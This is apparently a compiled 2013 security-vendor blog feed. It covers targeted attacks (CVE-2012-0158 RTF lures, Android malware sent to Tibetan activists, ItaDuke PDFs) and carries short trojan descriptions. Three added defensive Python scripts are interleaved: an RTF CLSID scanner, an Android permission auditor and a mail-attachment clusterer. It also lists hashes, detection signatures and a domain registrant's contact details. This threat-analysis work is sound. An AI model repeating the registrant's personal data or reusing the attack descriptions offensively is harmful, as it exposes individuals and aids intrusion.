There has been a lot of attention on recent reports of a DDoS attack against Spamhaus that peaked at 300 Gbps. Yes, that amount of traffic makes this one of the biggest DDoS attacks ever seen. DDoS attacks have grown in popularity in recent times and there is no sign they will go away anytime soon: cybercriminals, competitors, hacktivists and nation-state sponsored actors all have their motives for using them. In this case, the suspected entity behind the attacks is a Dutch hosting company called CyberBunker, whose owner denies responsibility but claims to be a spokesman for the attackers. The conflict between Spamhaus and CyberBunker goes back to 2011 and escalated after Spamhaus blacklisted CyberBunker earlier this month. The timing is uncanny. Spamhaus is certainly under attack from a determined group capable of generating massive amounts of traffic, which forced it to move to the hosting and service provider CloudFlare, known for effectively dissipating large DDoS attacks.
Posted on 30 March 2013 | 12:25 am
Military Hardware and Men’s Health
Over the last few months we have seen a series of very similar targeted attacks being blocked by our Linux Mail Security product. In each case the documents used were RTF files and the exploit was CVE-2012-0158 (MSCOMCTL.OCX RCE vulnerability).
The attacks seem to come from the same group and most appear to be sent from Australia or the Republic of Korea. The sender IP addresses vary, but many are sent via mail.mailftast.com. This domain is registered in China:
REGISTRANT CONTACT INFO
liu runxin
No.1, Nanjing Road
Shanghai, Shanghai 200001
CN
Phone: +86.2164415698
Email Address: lishd2011@163.com

The documents fall into three categories:
- The first group of documents relate to articles on the Men's Health website. Some example filenames:
  EAT FOR BETTER SEX.doc
  How to last longer in bed.doc
  6 Awkward Sex Moments, Defused.doc
  9 ways to have better,hotter,and more memorable sex.doc
  10 Ways to Get More Sex.doc
- The second group are military related:
  Stealth Frigate.doc
  The BrahMos Missile.doc
  How DRDO failed India's military.doc
- The third set have Cyrillic filenames (English translation in brackets):
  приоритеты сотрудничества.doc (cooperation priorities)
  Список участников рабочей группы(0603-2013).doc (list of working group participants (0603-2013))
  Список кадров.doc (personnel list)
  Приглашение МИОМ ТЕЙКОВО 2013.doc (invitation МИОМ TEYKOVO 2013)
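A first triage step for RTF attachments like these is to look for the MSCOMCTL control that CVE-2012-0158 lives in, before any sandbox run. The script below is an added example and not Kaspersky's detection logic: it hex-decodes every \objdata group in an RTF file, skipping the whitespace and stray control words that obfuscated samples interleave with the hex, and searches the result for the ListView and TreeView control CLSIDs in binary form and for the control's ProgID string in the embedded OLE header. The two CLSIDs are taken from public detection signatures for this CVE, not from the post above; the RTF samples are constructed and carry only the header markers a scanner keys on, not an exploit.

```python
"""Static triage of RTF files for embedded MSCOMCTL controls (added example)."""
import re
import uuid

# CLSIDs of the MSCOMCTL.OCX controls targeted by CVE-2012-0158 exploits, as listed in
# public detection signatures (assumption: not taken from the post; verify against your rules).
LISTVIEW = "BDD1F04B-858B-11D1-B16A-00C0F0283628"
TREEVIEW = "C74190B6-8589-11D1-B16A-00C0F0283628"
MSCOMCTL_CLSIDS = {LISTVIEW: "MSComctlLib.ListViewCtrl.2", TREEVIEW: "MSComctlLib.TreeCtrl.2"}
HEX = set("0123456789abcdefABCDEF")


def objdata_blobs(rtf):
    """Yield the decoded bytes of every \\objdata group. Whitespace and interleaved
    control words (a common obfuscation) are skipped; nested groups are honoured."""
    for m in re.finditer(r"\\objdata", rtf):
        i, depth, hexchars = m.end(), 0, []
        while i < len(rtf):
            c = rtf[i]
            if c == "{":
                depth += 1
            elif c == "}":
                if depth == 0:
                    break
                depth -= 1
            elif c == "\\":
                j = i + 1
                while j < len(rtf) and rtf[j].isalpha():
                    j += 1
                if j == i + 1:                       # control symbol such as \' or \\
                    j += 1
                else:                                # optional numeric parameter
                    while j < len(rtf) and (rtf[j].isdigit() or rtf[j] == "-"):
                        j += 1
                i = j
                continue
            elif c in HEX:
                hexchars.append(c)
            i += 1
        if len(hexchars) % 2:
            hexchars.pop()
        yield bytes.fromhex("".join(hexchars))


def scan_rtf(rtf):
    """Return (clsid, description, where) hits for MSCOMCTL controls in the document."""
    hits = []
    for n, blob in enumerate(objdata_blobs(rtf)):
        for clsid, progid in MSCOMCTL_CLSIDS.items():
            if uuid.UUID(clsid).bytes_le in blob:        # GUID as stored on disk
                hits.append((clsid, progid, "objdata[%d]: binary CLSID" % n))
            if progid.encode() in blob:                  # ProgID text in the OLE header
                hits.append((clsid, progid, "objdata[%d]: ProgID string" % n))
    upper = rtf.upper()
    for clsid, progid in MSCOMCTL_CLSIDS.items():
        if clsid in upper:                               # e.g. in \objclass or \oleclsid text
            hits.append((clsid, progid, "CLSID text in RTF source"))
    return hits


def _fake_objdata_hex(clsid, progid):
    """Constructed OLE-style header: version, marker, ProgID, CLSID, filler. Only the
    markers a scanner looks for; not a working object and not an exploit."""
    raw = (b"\x01\x05\x00\x00\x02\x00\x00\x00" + progid.encode() + b"\x00"
           + uuid.UUID(clsid).bytes_le + b"\x00" * 32)
    h = raw.hex()
    # sprinkle a control word and line breaks through the hex, as obfuscated samples do
    return h[:20] + "\\par\n" + h[20:60] + "\n" + h[60:]


SUSPICIOUS_RTF = ("{\\rtf1\\ansi{\\object\\objemb{\\*\\objdata "
                  + _fake_objdata_hex(LISTVIEW, MSCOMCTL_CLSIDS[LISTVIEW]) + "}}}")
BENIGN_RTF = "{\\rtf1\\ansi Quarterly report\\par Nothing embedded here.}"

if __name__ == "__main__":
    for name, doc in (("suspicious", SUSPICIOUS_RTF), ("benign", BENIGN_RTF)):
        print(name, scan_rtf(doc))
```

A hit here means the document embeds a control that has no business in a mail attachment, not proof of exploitation; the document should still go to a sandbox, but it can be quarantined on this signal alone.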
Posted on 29 March 2013 | 8:40 am
Android Trojan Found in Targeted Attack
In the past, we've seen targeted attacks against Tibetan and Uyghur activists on Windows and Mac OS X platforms. We've documented several interesting attacks (A Gift for Dalai Lamas Birthday and Cyber Attacks Against Uyghur Mac OS X Users Intensify) which used ZIP files as well as DOC, XLS and PDF documents rigged with exploits.
Several days ago, the e-mail account of a high-profile Tibetan activist was hacked and used to send targeted attacks to other activists and human rights advocates. Perhaps the most interesting part is that the attack e-mails had an APK attachment - a malicious program for Android.
The attack
On March 24th, 2013, the e-mail account of a high-profile Tibetan activist was hacked and used to send spear phishing e-mails to their contact list. This is what the spear phishing e-mail looked like:

Regarding the message text above: multiple activist groups recently organized a human rights conference in Geneva, and we've noticed an increase in the number of attacks using this event as a lure. Here's another example of such an attack, this one hitting Windows users:

Going back to the Android Package (APK) file attached to the e-mail: it delivers an Android application named "WUC's Conference.apk".
The malicious APK is a 334,326-byte file (MD5: 0b8806b38b52bebfe39ff585639e2ea2) and is detected by Kaspersky Lab products as "Backdoor.AndroidOS.Chuli.a".
After installation, an application named "Conference" appears on the device's home screen:

If the victim launches the app, they are shown text about the upcoming event:

Posted on 26 March 2013 | 8:14 am
The TeamSpy Crew Attacks - Abusing TeamViewer for Cyberespionage
Earlier today, the Laboratory of Cryptography and System Security (CrySyS Lab), together with the Hungarian National Security Authority (NBF), published details on a high profile targeted attack against Hungary. The details about the exact targets are not known and the incident remains classified.
Considering the implications of such an attack, Kaspersky Lab’s Global Research & Analysis Team performed a technical analysis of the campaign and related malware samples.
You can read our short FAQ below and you can download our technical analysis paper linked at the end of the blogpost.
Posted on 20 March 2013 | 1:23 pm
South Korean 'Whois Team' attacks
Earlier today, reports of a number of cyberattacks against various South Korean targets hit the news.
The attackers, going by the handle “Whois Team”, left a number of messages during the defacements:

Posted on 20 March 2013 | 8:09 am
The end of MSN Messenger, the beginning of attacks
Microsoft recently announced the shutdown of its popular IM client MSN Messenger, which is being replaced by Skype, and its end marks the beginning of malicious attacks posing as the software's installer. Cybercriminals have already started to exploit this: registering malicious domains, buying sponsored links on search engines and tricking users into downloading and installing malware masquerading as the MSN installer.
MSN Messenger is still very popular in several countries; Microsoft has said that the service has more than 100 million users worldwide, approximately 30.5 million of them in Brazil. As the migration of all users is scheduled, the program's installer is getting harder to find, and this is the window of opportunity exploited by Brazilian cybercriminals aiming to infect users looking for the software.
In a simple Google search for "MSN messenger", the first result displayed is a sponsored link to a malicious domain distributing the fake installer, which is actually a banking Trojan:

Posted on 19 March 2013 | 7:27 am
Hello from Malaysia
In mid-February 2013 a Kaspersky user from Malaysia asked us to check a Google Play application called My HRMIS & JPA Demo developed by Nur Nazri.

The user was suspicious about the large number of permissions required by the app, though its only stated function was to open four websites.

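The mismatch the user noticed, many permissions for an app whose only job is to open four web sites, can be checked mechanically once the manifest has been decoded to text (apktool produces a readable AndroidManifest.xml from an APK). The audit below is an added example, not Kaspersky's analysis and not the app's code: it reads the requested permissions, subtracts what an app of the declared kind needs (a web wrapper needs little beyond INTERNET) and reports the leftovers, naming those that reach user data or let the app run without the user. The manifest, the package name, the "web_wrapper" profile and the sensitive-permission list are this example's own.

```python
"""Permission audit for a decoded AndroidManifest.xml (added example)."""
import xml.etree.ElementTree as ET

ANDROID = "{http://schemas.android.com/apk/res/android}"

# What an app of a given declared kind plausibly needs. "web_wrapper": an app whose only
# function is to open a few web sites. These profiles are the example's own, not a policy
# from Android or Google Play.
PROFILES = {
    "web_wrapper": {"android.permission.INTERNET", "android.permission.ACCESS_NETWORK_STATE"},
}

# Permissions that reach user data or let the app act without the user. The list and the
# one-line reasons are the example's; a real audit would use the protection levels from the
# platform's own permission definitions.
SENSITIVE = {
    "android.permission.READ_SMS": "reads SMS, including banking TANs/OTPs",
    "android.permission.RECEIVE_SMS": "intercepts incoming SMS",
    "android.permission.SEND_SMS": "can send (premium-rate) SMS",
    "android.permission.READ_CONTACTS": "harvests the address book",
    "android.permission.READ_CALL_LOG": "reads call history",
    "android.permission.READ_PHONE_STATE": "device identifiers and phone number",
    "android.permission.ACCESS_FINE_LOCATION": "precise location",
    "android.permission.RECORD_AUDIO": "microphone",
    "android.permission.RECEIVE_BOOT_COMPLETED": "starts itself at boot",
}


def requested_permissions(manifest_xml):
    """Set of android:name values from every <uses-permission> element."""
    root = ET.fromstring(manifest_xml)
    return {e.get(ANDROID + "name") for e in root.iter("uses-permission") if e.get(ANDROID + "name")}


def audit(manifest_xml, profile):
    """Compare requested permissions with the profile; flag sensitive leftovers."""
    perms = requested_permissions(manifest_xml)
    excess = perms - PROFILES[profile]
    flagged = {p: SENSITIVE[p] for p in sorted(excess) if p in SENSITIVE}
    return {"requested": sorted(perms), "excess": sorted(excess), "flagged": flagged,
            "verdict": "suspicious" if flagged else "ok"}


# Constructed manifests (package names and permission sets invented for the example).
SUSPECT_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.example.webwrapper">
  <uses-permission android:name="android.permission.INTERNET"/>
  <uses-permission android:name="android.permission.READ_SMS"/>
  <uses-permission android:name="android.permission.RECEIVE_SMS"/>
  <uses-permission android:name="android.permission.READ_CONTACTS"/>
  <uses-permission android:name="android.permission.READ_PHONE_STATE"/>
  <uses-permission android:name="android.permission.ACCESS_FINE_LOCATION"/>
  <uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED"/>
  <application android:label="Demo"><activity android:name=".Main"/></application>
</manifest>"""

BENIGN_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.example.webwrapper">
  <uses-permission android:name="android.permission.INTERNET"/>
  <uses-permission android:name="android.permission.ACCESS_NETWORK_STATE"/>
  <application android:label="Demo"><activity android:name=".Main"/></application>
</manifest>"""

if __name__ == "__main__":
    for name, manifest in (("suspect", SUSPECT_MANIFEST), ("benign", BENIGN_MANIFEST)):
        r = audit(manifest, "web_wrapper")
        print(name, r["verdict"], r["excess"])
        for perm, why in r["flagged"].items():
            print("  ", perm, "->", why)
```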
Posted on 15 March 2013 | 10:48 am
Highlights from BlackHat Europe 2013 in Amsterdam
Every year, as Europe wakes from the cold winter to the warm days of spring, BlackHat traditionally descends on Amsterdam. This year's conference is taking place on March 14-15 at the NH Grand Hotel Krasnapolsky, right on Dam Square in the heart of Amsterdam. As spring doesn't necessarily mean warm days in Europe right now, the 500 or so BlackHat participants hit the conference rooms to attend quite a few interesting talks. Here's a summary of the best talks at BlackHat Europe 2013.
Posted on 15 March 2013 | 10:41 am
Reminder: be careful opening invoices on the 21st March
On March 4th we spotted a large number of unusual emails being blocked by our Linux Mail Security product. The emails all contained the same PDF attachment (MD5: 97b720519aefa00da58026f03d818251) but were being sent from many different source addresses.
The emails were written in German and most were sent from German IP addresses. Below is a map showing the distribution of addresses:

The computer names referenced in the mail headers were often of the form Andreas-PC or Kerstin-Laptop (the names have been changed to protect the innocent) suggesting that they had been sent from German home computers.
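Both the APK attached to the Tibetan spear-phishing mails described above and the PDF sent from many German home computers here are cases where the attachment's content and the mail's origin tell you more than the file name or the sender address. The script below is an added example, not Kaspersky's mail-security product: it identifies each attachment by content (an APK is a ZIP carrying AndroidManifest.xml and a classes.dex), hashes it, pulls the client host name and IP out of the topmost Received header, and groups a batch of mails by attachment hash so that one hash arriving from many consumer-looking host names (Andreas-PC, Kerstin-Laptop) stands out. The mails, host names and addresses are constructed (documentation IP ranges and .invalid domains); the fake APK and PDF are stand-ins carrying only the bytes a classifier needs.

```python
"""Batch triage of mail attachments and sending hosts (added example)."""
import email
import hashlib
import io
import re
import zipfile
from collections import defaultdict
from email import policy
from email.message import EmailMessage

# "from <client-name> (<rdns> [<ip>])" as most MTAs write it into a Received: header.
RECEIVED_FROM = re.compile(r"from\s+(\S+)\s+\([^)]*?\[(\d{1,3}(?:\.\d{1,3}){3})\]", re.I)
HOME_PC = re.compile(r"^[A-Za-z]+-(PC|Laptop|Notebook)$", re.I)   # Andreas-PC, Kerstin-Laptop


def classify(data):
    """Identify an attachment by its content rather than by its file name."""
    if data.startswith(b"%PDF-"):
        return "pdf"
    if data.startswith(b"MZ"):
        return "pe"
    if data.startswith(b"PK\x03\x04"):
        try:
            names = set(zipfile.ZipFile(io.BytesIO(data)).namelist())
        except zipfile.BadZipFile:
            return "zip(corrupt)"
        if "AndroidManifest.xml" in names and any(n.startswith("classes") and n.endswith(".dex") for n in names):
            return "apk"
        return "zip"
    return "other"


def triage_mail(raw):
    """Attachments (type, md5) plus the host that handed the mail to our MX."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    attachments = []
    for part in msg.iter_attachments():
        data = part.get_payload(decode=True) or b""
        attachments.append({"name": part.get_filename(), "type": classify(data),
                            "md5": hashlib.md5(data).hexdigest()})
    # The topmost Received: header was written by our own MX, so the client it names is
    # the host that actually connected to us (for direct-to-MX spam, the bot itself).
    src_host = src_ip = None
    for rcvd in msg.get_all("Received", []):
        m = RECEIVED_FROM.search(str(rcvd))
        if m:
            src_host, src_ip = m.group(1), m.group(2)
            break
    return {"from": str(msg["From"]), "attachments": attachments, "src_host": src_host,
            "src_ip": src_ip, "consumer_host": bool(src_host and HOME_PC.match(src_host))}


def cluster_by_attachment(raws):
    """Group a batch of raw mails by attachment hash: one hash from many consumer
    hosts is the botnet-spam pattern described in the post."""
    groups = defaultdict(lambda: {"type": None, "names": set(), "src_ips": set(), "consumer_hosts": 0})
    for raw in raws:
        t = triage_mail(raw)
        for a in t["attachments"]:
            g = groups[a["md5"]]
            g["type"] = a["type"]
            g["names"].add(a["name"])
            if t["src_ip"]:
                g["src_ips"].add(t["src_ip"])
            g["consumer_hosts"] += t["consumer_host"]
    return dict(groups)


def _fake_apk():
    """Constructed stand-in: a ZIP with the two entries every real APK has."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("AndroidManifest.xml", "<binary manifest placeholder>")
        z.writestr("classes.dex", "dex\n035" + "\x00" * 8)
    return buf.getvalue()


FAKE_PDF = b"%PDF-1.4\n%constructed sample, not the attachment from the post\n%%EOF\n"


def _mail(sender, received, filename, data, subtype):
    m = EmailMessage()
    m["From"], m["To"], m["Subject"] = sender, "victim@example.invalid", "Rechnung"
    m["Received"] = received
    m.set_content("Anbei die Rechnung.")
    m.add_attachment(data, maintype="application", subtype=subtype, filename=filename)
    return m.as_bytes()


SAMPLE_BATCH = [   # constructed mails
    _mail("a@example.invalid", "from Andreas-PC (h10.example.invalid [192.0.2.10]) by mx.example.invalid",
          "Rechnung.pdf", FAKE_PDF, "pdf"),
    _mail("k@example.invalid", "from Kerstin-Laptop (h23.example.invalid [192.0.2.23]) by mx.example.invalid",
          "Rechnung.pdf", FAKE_PDF, "pdf"),
    _mail("m@example.invalid", "from Michael-PC (h7.example.invalid [198.51.100.7]) by mx.example.invalid",
          "Rechnung.pdf", FAKE_PDF, "pdf"),
    _mail("activist@example.invalid", "from mail.example.invalid (mail.example.invalid [203.0.113.5]) by mx.example.invalid",
          "WUC's Conference.apk", _fake_apk(), "vnd.android.package-archive"),
]

if __name__ == "__main__":
    for md5, g in cluster_by_attachment(SAMPLE_BATCH).items():
        print(md5, g["type"], sorted(g["names"]), "ips:", len(g["src_ips"]), "consumer hosts:", g["consumer_hosts"])
```

Compare the md5 values the script prints against published IOCs (the post gives 97b720519aefa00da58026f03d818251 for the PDF and the Android post gives 0b8806b38b52bebfe39ff585639e2ea2 for the APK); the constructed samples will not match, by design.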
Posted on 14 March 2013 | 11:23 am
New Uyghur and Tibetan Themed Attacks Using PDF Exploits
On Feb 12th 2013, FireEye announced the discovery of an Adobe Reader 0-day exploit used to drop a previously unknown, advanced piece of malware. We called this new malware "ItaDuke" because it reminded us of Duqu and because of the ancient Italian comments in the shellcode, copied from Dante Alighieri's "Divine Comedy".
Previously, we posted about another campaign hitting governments and other institutions, named Miniduke, which used the same "Divine Comedy" PDF exploits.
In the meantime, we've come across other attacks which piggyback on the same high-level exploit code, only this time the targets are different: Uyghur activists.
Together with our partners at AlienVault Labs, we analyzed these new exploits. Their blog post, which includes Yara rules and industry-standard IOCs, is [here]. Our own analysis follows below.
The new attacks
A few days ago, we observed several PDF files which carry the CVE-2013-0640/0641 (ItaDuke) exploits. Some of the MD5s and filenames include:
  7005e9ee9f673edad5130b3341bf5e5f  2013-Yilliq Noruz Bayram Merik isige Teklip.pdf
  d00e4ac94f1e4ff67e0e0dfcf900c1a8  ÁLÃûÐÅ.pdf (joint_letter.pdf)
  ad668992e15806812dd9a1514cfc065b  arp.pdf
The Kaspersky detection name for these exploits is Exploit.JS.Pdfka.gjc.
Posted on 14 March 2013 | 6:55 am
Trojan-Downloader.JS.Agent.gdn
If your computer is not protected by anti-virus software and has been infected with this malware, take the following actions to remove it: delete the original program file (its...
Posted on 31 January 2013 | 8:21 am
Trojan.Win32.Scar.dgje
A trojan program. It is a Windows application (PE-EXE file). 742912 bytes. Packed by an unknown packer. Unpacked size - around 788 kB. Written in Delphi. Installation When launching, the...
Posted on 31 January 2013 | 8:17 am
Trojan.Win32.KillAV.gcg
The malicious library exports the "testall" function which leads to the following actions being carried out. If the system launches the "avp.exe" process, the trojan tries to download the following...
Posted on 31 January 2013 | 7:52 am
Trojan.Win32.Agent2.dmdi
The malicious library is a component of a trojan program designed to steal the user's authentication data. It is a Windows dynamic-link library (PE-DLL file). 8192 bytes. Written in C++.
Posted on 30 January 2013 | 9:59 am
Trojan-Downloader.JS.Agent.gbj
A trojan program that uses vulnerabilities in Oracle Java and Adobe Reader/Acrobat products to download and launch other malware. It is an HTML document containing JavaScript. 88200 bytes.
Posted on 30 January 2013 | 9:42 am
Trojan-Downloader.JS.Agent.gaf
A trojan program that uses vulnerabilities in Oracle Java and Adobe Reader/Acrobat products to download and launch other malware. It is an HTML document containing JavaScript. 88518 bytes.
Posted on 30 January 2013 | 9:24 am
Trojan.Win32.Jorik.Carberp.ar
A trojan that provides the attacker with remote access to the infected computer. It is a Windows application (PE-EXE file). 176640 bytes. UPX packed. Unpacked size - around 245 kB. Written in...
Posted on 29 January 2013 | 5:28 am
Trojan.Win32.Agent2.dmvt
After launching, the trojan checks for the following branch in the system registry: [HKCU\Software\Classes\CLSID\{82404416-4C60-47F8-BA06-90BA7261C3AE}\InprocServer32] If the branch is missing, it...
Posted on 29 January 2013 | 5:20 am
Trojan.Win32.KillFiles.afz
A trojan program designed to delete components of the security software Gbuster plugin for Internet Explorer. Implemented in the form of an NT kernel mode driver. 5632 bytes. Written in C++.
Posted on 29 January 2013 | 5:15 am
Trojan.Win32.Agent.fajk
A trojan program that downloads files from the Internet without the user's knowledge and launches them. It is a Windows application (PE-EXE file). 6656 bytes. Written in C++. Installation After...
Posted on 24 January 2013 | 6:25 am
Trojan.Win32.Jorik.Buterat.dp
A trojan program that carries out destructive actions on the user's computer. It is a Windows application (PE-EXE file). 56832 bytes. Packed by an unknown packer. Unpacked size - around 53 kB....
Posted on 24 January 2013 | 5:51 am
AdWare.Win32.Gamevance.hfti
Adware designed to redirect user searches to other web resources. It is a Windows application (PE-EXE file). 1135840 bytes. Written in C++. Installation The trojan is installed as an add-in for the...
Posted on 24 January 2013 | 5:34 am
Trojan-Downloader.Win32.Small.bven
A trojan program that downloads files from the internet without the user's knowledge and launches them. It is a Windows application (PE-EXE file). 7168 bytes. Written in C++. Installation When...
Posted on 23 January 2013 | 5:40 am
Trojan.NSIS.Miner.a
A trojan program. It is a Windows application (PE-EXE file). 244927 bytes. This malware was built with the installer-package builder Nullsoft Scriptable Install...
Posted on 23 January 2013 | 3:50 am
Trojan.Java.Agent.an
A trojan program that downloads files from the Internet without the user's knowledge and launches them. It is a JAR archive containing a set of Java classes (class files). 15661 bytes.
Posted on 23 January 2013 | 3:40 am
Exploit.JS.CVE-2010-4452.t
When the malicious HTML document is opened, it is decoded using JavaScript and code is written into its body which carries out the following actions: it launches a script, the location of...
Posted on 22 January 2013 | 6:39 am
Trojan-Downloader.JS.Agent.gcv
After the malicious HTML page is opened in the browser, it displays the following message: 404 Not Found. Then, using JavaScript, the trojan collects system information, in particular: the type of OS...
Posted on 22 January 2013 | 6:29 am
Trojan-Dropper.Win32.StartPage.eba
If the path to the trojan file does not contain a sequence of "ommon" symbols, the trojan will retrieve a script from its body and will launch this script under the following name: %ProgramFiles%\<...
Posted on 22 January 2013 | 4:22 am
Trojan-Dropper.Win32.Agent.ezqm
A trojan program that installs and launches other software on the infected computer without the user's knowledge. It is a Windows application (PE-EXE file). 231124 bytes. Written in C++.
Posted on 21 January 2013 | 4:00 am
Trojan-Downloader.Win32.VB.aiqx
When launching, the trojan downloads a file from the internet using the following link: http://<rnd>.***heker.com Where <rnd> is a random sequence of digits. The link did not work...
Posted on 21 January 2013 | 3:56 am